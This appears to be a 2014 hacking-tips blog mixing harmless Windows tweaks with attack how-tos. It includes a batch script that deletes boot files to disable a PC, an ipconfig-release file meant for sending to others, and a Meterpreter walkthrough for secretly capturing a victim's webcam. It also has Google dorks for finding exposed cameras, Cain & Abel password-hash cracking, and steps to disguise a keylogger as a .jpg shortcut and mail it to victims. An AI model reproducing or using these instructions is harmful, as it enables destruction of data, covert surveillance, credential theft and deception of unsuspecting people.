HERE THERE R SOME EXCELLENT VIRUS SCRIPTS OF WEBS MOST DANGEROUS SCRIPTS ALSO INCLUDED IN THEM How to crash a PC Forever !:::
@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
Open up notepad and copy and paste that. Save it as a .bat file.
This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.
REMEMBER - DO NOT CLICK THIS FILE. (for the idiots)
**Also remember this might not work with vista.**
Wednesday, 8 October 2014
HOW MAKE A VIRUS IN NOTEPAD
Tuesday, 7 October 2014
Freeze someone's desktop
This is a funny trick, u can freeze someone's desktop
1.close everything u r working in, and work on desktop. so click on prtscr on your keyboard.
2.go to paint and click on edit then paste
3.save this file as (name).bmp and close the paint.
3.now in the desktop, we have 2 remove desktop icons and shortcuts, so right click on the mouse and then properties, click on desktop then select customize desktop.
4.uncheck all the boxes in desktop icons and press ok. then press apply then ok.
5.now to remove the shortcuts in the desktop, go to start and select My Computer, then click on c: right click on ur mouse and select new folder, write it any name
6.now go to desktop & select all da icons and right click on them then press cut,go to c: and paste them in the folder dat u created then close the window.
7.now to put the fake desktop image and remove the taskbar, so right click on desktop and gp to properties, now go to desktop and select Browse, select the file that u saved then press appply then ok. now to remove the windows taskbar, right click on the taskbar and go 2 properties, then select autohide the taskbar and then apply then ok now all the icons r fake and the user will think that his desktop is freezed
enjoy it.!
Sunday, 5 October 2014
Stop someone's internet access
@Echo off
Ipconfig /release
Save that as a .bat and send it to someone. They're IP address will be lost, and therefore they won't be able to fix it
However, this is VERY easy to fix. Simply type in IPconfig /renew
Thursday, 2 October 2014
Check Your Anti-Virus
This Trick Will Check Your Antivirus "ACTIVITY" Means How Active And Efficient Your Antivirus Is.
To Check Your Antivirus Efficiency Follow Below Steps:
Step1:Open Notepad.
Step2:Copy Paste Below Code There.
X5O!P%@AP[4PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Step3:Save The File As ".exe "Extension,Such As "Antivirus-tester.exe" Or "Whatever-you-want.exe".
Step4:Now After Saving The File,Your Antivuirus Will Be Attempting To Delete That File Or Not To Allow You To Leave It.
Step5:If This Happens,Than,Your Antivirus Is Working Properly,If Not,Than Your Antivirus Needs To Be Update Or Even Be Changed.
Step6:Enjoy This Trick.
Thursday, 25 September 2014
Download YouTube Videos
Here I Will Tell U A Simple Trick For Downloading YouTube Videos :
Step 1 : Open Any Video
Step 2 : Now You have change the url of that video
Example :
www.youtube.com/video/adadsdsaddsada
now change this with
ssyoutube.com/video/adadsdsaddsada
After Doing This Hit Enter And You Will Be Redirected To The Download Page Just Select The Output Format and Quality…!!
Saturday, 20 September 2014
Hack Webcam by Meterpreter
In early 2014, a hacker was sentenced to 18 months for doing just this to Miss Teen USA, 2013. He broke into the computer, took a few clicks and blackmailed the victim to send more photos. (Google it up for more information) While the exact method he used is unknown, it's very likely this exact method that we'll be trying out. The point of this tutorial is to show just how easy it really is. While developing your own hacks and discovering loop holes is a whole different level of hacking, quite a lot of hacking can be done just by knowing a surprisingly small number of things. Perhaps not even that, after all we can simply search an exploit in metasploit and a get a whole list of things that'll work. The hard part of hacking is breaking into a system while maintaining anonymity. Once that is done, we pretty much own the target system. Hacking is not about being a computer geek as much as being 'in the know'.
Our best friend Meterpreter is going to help us with this hack. With Meterpreter we can install a keylogger, hack the webcam and the list goes on and on. You can basically do almost anything that you can do on your own computer, to your victim. All we need for this hack, is to first break in with Metasploit and install meterpreter on their system. How do we do that?
After picking an attack module to exploit a vulnerability, we have the option to set a payload. The payload tells metasploit what to do on the victim's computer once it breaks in. Meterpreter is a payload. The command usually looks like:
Set payload windows/meterpreter/reverse_tcp
If the attack was successful, metasploit automatically installs meterpreter on the target system and we can move on to hacking the webcam, in this case. We can also get our meterpreter session by using exploits like Aurora (for IE6). After getting the meterpreter session in our command, you can follow the steps below to hack the webcam.
Step 1: Find if there is a webcam.
Metasploit's Meterpreter has a built-in module for searching and controlling the remote system's webcam (Because apparently there are so many creepy hackers that we now have this hack at our fingertips). We can start off by searching if the system even has a webcam or not.me. The command below is used for that, it also returns us the name of the webcam.
meterpreter > webcam_list
If a webcam was found, Meterpreter will them all out. Usually we just find one.
Step 2: Say Cheese!
If the last command gave us a webcam we can go ahead and snap a photo:
meterpreter > webcam_snap
If all went fine a picture will be saved in the directory: /opt/framework3/msf3 We can simply go there and see what we got. We can't do anything about the quality of the image, it all depends on the webcam. Still, better than nothing, right?
Step 3: Streaming video.
So we got a picture, let's see how to get a live video stream. We can do this by typing the command below: (We're using –p parameter to specify the directory we want to give to the video streaming file)
meterpreter > run webcam -p /var/www
This command fires up the victim's webcam and sends its video output to /var/www/webcam.htm. You can open up this file and check out what's going on at the other end in live video feed.
Another thing that deservers mention here is the little light that is often found next to many laptop cameras and on some separate webcams too. Will the light be turned on by this hack? It depends on the way the camera manufacture implemented the 'take a photo' and 'take a video' functions and on which software is set as default to use the camera. So this hack is not all that risk-free. But then again, what's life without a little risk? (Just kidding, people go to jail for this. Be careful.)
Protecting yourself
In 3 small commands we can peek into our victim's webcam. How to make sure this doesn't happen to you? This hack has a very complicated and highly technical flaw: It can be completely stopped by something as little as a tissue on the webcam.
Saturday, 13 September 2014
Make A Personal Log Book Using Notepad
Did you know that you can also use Notepad as a simple digital diary or a personal Log-Book ? Well, if you didn’t then follow the below mentioned steps to make one for yourself ! Open Notepad. Type .LOG (in capital letters) and hit enter. Save it with any name and close it. Open it again. When you open the file again you will see the current date and time being inserted automatically after the .LOG line. This will happen automatically every time you reopen the the notepad file.
Friday, 12 September 2014
Hack into Live Cameras Around the World
* inurl:”CgiStart?page=” * inurl:/view.shtml * intitle:”Live View / – AXIS * inurl:view/view.shtml * inurl:ViewerFrame?Mode= * inurl:ViewerFrame?Mode=Refresh * inurl:axis-cgi/jpg * inurl:axis-cgi/mjpg (motion-JPEG) (disconnected) * inurl:view/indexFrame.shtml * inurl:view/index.shtml * inurl:view/view.shtml * liveapplet * intitle:”live view” intitle:axis * intitle:liveapplet * allintitle:”Network Camera NetworkCamera” (disconnected) * intitle:axis intitle:”video server” * intitle:liveapplet inurl:LvAppl * intitle:”EvoCam” inurl:”webcam.html” * intitle:”Live NetSnap Cam-Server feed” * intitle:”Live View / – AXIS” * intitle:”Live View / – AXIS 206M” * intitle:”Live View / – AXIS 206W” * intitle:”Live View / – AXIS 210? * inurl:indexFrame.shtml Axis * inurl:”MultiCameraFrame?Mode=Motion” (disconnected) * intitle:start inurl:cgistart * intitle:”WJ-NT104 Main Page” * intitle:snc-z20 inurl:home/ * intitle:snc-cs3 inurl:home/ * intitle:snc-rz30 inurl:home/ * intitle:”sony network camera snc-p1? * intitle:”sony network camera snc-m1? * site:.viewnetcam.com -www.viewnetcam.com * intitle:”Toshiba Network Camera” user login * intitle:”netcam live image” (disconnected) * intitle:”i-Catcher Console – Web Monitor”2)Once you have picked one, simply copy it, and paste in on google. 3)Now choose any result and you will be seeing a live camera.
Thursday, 11 September 2014
World Trade Centre Attack In Notepad
As you might be knowing that the flightnumber of the plane that had hit World Trade Center on that dreadful day (9/11) was Q33NY. Now call this trick a coincidence or something else but whatever it is, it does startle us. Open Notepad. Type “Q33N” (without quotes) in capital letters. Increase the font size to 72. Change the Font to Wingdings. You will be amazed by the findings.
Thursday, 4 September 2014
Delete Recycle Bin
As we all know that there is no direct option in windows to remove the recycle bin from the desktop. So, here is the method to remove the Recycle Bin from your Desktop. Follow the Steps Below : Step1: Go to RUN (Window+R or Start->run)Type in there the following command "gpedit.msc"and press Enter : Step2: User Configuration>Administrative Templates> Desktop>Remove Recycle Bin from desktop Step3: NOW open RUN and type " gpupdate.exe " and hit Enter. A command prompt will open and process your query. Restart the system. The Recycle Bin icon is not anymore on your desktop.
Monday, 1 September 2014
Hack Administrator Password in Window XP
Just follow steps below. 1) Download Cain & Abel v2.0 from www.oxid.it and install it. 2)Start Cain 3)Click on Cracker tab , on the left choose LM & NTLM Hashes and click on + sign icon on toolbar then Dump NT Hashes from Local machine
4) Now you will see 5) After this will appear windows accounts , right click on account you want to break password and choose type of attack , in this example I chose brute force attack. Brute force actually means to start with a letter a and encrypting it. Then see if the encrypted strings match. If not then b, c,.. until we‘ve gotten to admin. Then the encrypted strings will match and we‘ll know that is the right password.Brute force attack is the slowest method of cracking, but there is no risk that you‘ll not find the password. The thing about brute force is that the time of cracking rises rapidly depending on how long the password is, how many characters are being used in it and so forth.Sunday, 31 August 2014
Use Your Pendrive As Ram
Just Follow These Steps To Use your Pen Drive As Ram : Step 1 : Insert your Pendrive Step 2 : Now Go To My Computer Properties and click on advanced
Step 3 : Now Click On Setting Of Performance Step 4 : Now Click On Change Step 5 : Now Select The Pendrive And Click On Custom Size Enter 1024 in Initial Size And 3028 in Maximum Size.Friday, 22 August 2014
Increase Internet Speed Manually
Most of us face the problem of slow internet, Majority of people demanded for a trick or tweak to increase their internet speed, so here are some tweaks and tips to increase you internet speed. 1) Optimize your computer's bandwidth settings by using the Windows Group Policy Editor (GPedit). Go to the start menu and click "run". Type "gpedit.msc" and press "enter." On the left side of the screen, click on "administrative templates" and select "network." Next, click on "QoS packet scheduler" and then click on "limit reservable bandwidth." Next, change the options to "enabled" and change the bandwidth limit to zero percent. This will increase your Internet speed by 20 percent. 2) Reset the Windows network sockets. An operating system uses network sockets to send information through a network. However, these network sockets can become overloaded over time. To reset the network sockets, go to "run" and type "cmd" to execute the command and prompt program. Now type "netsh winsock reset" and press "enter." To finish the task, restart your computer. 3)Increase the speed of Internet Explorer. Open the command and prompt program, type "regsvr32 actxprxy" and press "enter." This will increase the speed of Internet Explorer by about 10 percent. 4)Open your default Internet browser, and surf the web to test the new performance of your Internet.
Wednesday, 20 August 2014
Hide keyloggers in a .jpg file
Through this trick you can easily hide keyloggers. First download any key logger from google i think Ardamax is best.After installing just follow these easy steps=> 1) Firstly, create a new folder and make sure that the options 'show hidden files and folders' is checked and ‘hide extensions for known file types’ is unchecked. Basically what you need is to see hidden files and see the extension of all your files on your pc. 2) Paste a copy of your server on the new created folder. Let's say it's called 'server.exe' (that's why you need the extension of files showing, cause you need to see it to change it) 3) Now you’re going to rename this 'server.exe' to whatever you want, let’s say for example 'picture.jpeg' 4) Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES. 5) Now create a shortcut of this 'picture.jpeg' in the same folder. 6) Now that you have a shortcut, rename it to whatever you want, for example, 'me.jpeg'. 7) Go to properties (on file me.jpeg) and now you need to do some changes there. 8) First of all delete all the text on field 'Start In' and leave it empty. 9) Then on field 'Target' you need to write the path to open the other file (the server renamed 'picture.jpeg') so you have to write this : 'C:\WINDOWS\system32\cmd.exe / c picture.jpeg' 10) The last field, 'c picture.jpeg' is always the name of the first file. If you called the first file 'soccer.avi' you gotta write 'C:\WINDOWS\system32\cmd.exe /c soccer.avi'. 11) So what you’re doing is when someone clicks on 'me.jpeg', a cmd will execute the other file 'picture.jpeg' and the server will run. 12) On that file 'me.jpeg' (shortcut), go to properties and you have an option to change the icon. Click that and a new window will pop up and you have to write this :- %SystemRoot% \system32\SHELL32.dll . Then press OK. 13) You can set the properties 'Hidden' for the first file 'picture.jpeg' if you think it’s better to get a connection from someone. 14) But don’t forget one thing, these 2 files must always be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter. 15) For me for example I always want the shortcut showing first so can be the first file to be opened. So I rename the server to 'picture2.jpeg' and the shortcut to 'picture1.jpeg'.This way the shortcut will show up first. If you set hidden properties to the server 'picture.jpeg' then you don’t have to bother with this detail but I’m warning you, the hidden file will always show up inside of a Zip or a Rar file. 16) So the best way to send these files together to someone is compress them into Zip or Rar. 17) inside the Rar or Zip file you can see the files properties and even after all this work you can see that the shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to open it.
Friday, 15 August 2014
Trace An Email
Generally, the path taken by an email while traveling from sender to receiver can be explained by following diagram.
So here is the method of tracing the exact location from the email sent.I am showing the email tracing on gmail here but yahoo and other mail providing services have same concept. Step 1:-First open up your email account and click on your inbox. Step 2:-Now Select any email that you want to trace. Step 3:-After Opening scrool the mail at the top and in right corner you will see a Option then Show Original click on it. Have a close eye on these contents 1. Received From: -The IP address at last is the real IP address of the person who is sending this mail. 2. To see the proper location of this IP address Go to www.whatismyip.com or www.whois.domaintools.com .These websites help you to find the whole detail and satellite images ofthe ISP location from the Email was sent.Get Your Lost Windows Password
1. Go to the ophcrack website and choose the correct operating system LiveCD to download. 2. With the downloaded .ISO, create a LiveCD the same way you did with the Ubuntu LiveCD in the Linux chapter. 3. Put the CD in your CD-Drive and restart to boot from the CD. 4. You will see the following screen:
5. HitThursday, 7 August 2014
Backup Your Email Into A Pen Drive
You can backup your All E-mail in to your PC or Pen drive by using Microsoft Outlook express. You can also use software that is MailStore, It is the best software for Email archiving and backup software .You can download Mailstore software from the official website of Mailstore. Click on the .exe file at your USB stick and click on Archive E-mail.
Click on Google mail. Enter your email address and password. You can test the access of your account by clicking on the Test button. Click on Next. Here you can configure the backup options. www.mailstore.com























